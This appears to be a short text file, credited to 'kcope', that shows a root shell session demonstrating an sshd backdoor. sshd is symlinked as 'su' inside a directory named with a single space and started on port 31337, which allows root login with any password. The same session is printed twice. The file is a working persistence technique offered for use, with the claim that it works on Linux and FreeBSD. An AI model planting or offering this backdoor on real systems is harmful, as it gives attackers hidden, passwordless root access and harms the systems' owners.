mubix/kcope_ssh_backdoor.txt

## kcope_ssh_backdoor.txt
simplest sshd backdoor ever.
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
# uname -a
FreeBSD BSDPWNED 9.0-RELEASE ...
BSDPWNED# mkdir /tmp/" "
BSDPWNED# ln -sf /usr/sbin/sshd /tmp/" "/su
BSDPWNED# /tmp/" "/su -oPort=31337
BSDPWNED# ssh -lroot -p31337 0
root@0's password: <any password>
Last login: Tue Jan 14 07:24:49 2014 from 127.0.0.1
FreeBSD 9.0-RELEASE (BSDPWNED) #0: Sun Jun 24 21:04:36 CEST 2012
BSDPWNED# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

works on linux and freebsd
/kcope
	simplest sshd backdoor ever.
	# id
	uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
	# uname -a
	FreeBSD BSDPWNED 9.0-RELEASE ...
	BSDPWNED# mkdir /tmp/" "
	BSDPWNED# ln -sf /usr/sbin/sshd /tmp/" "/su
	BSDPWNED# /tmp/" "/su -oPort=31337
	BSDPWNED# ssh -lroot -p31337 0
	root@0's password: <any password>
	Last login: Tue Jan 14 07:24:49 2014 from 127.0.0.1
	FreeBSD 9.0-RELEASE (BSDPWNED) #0: Sun Jun 24 21:04:36 CEST 2012
	BSDPWNED# id
	uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)

	works on linux and freebsd
	/kcope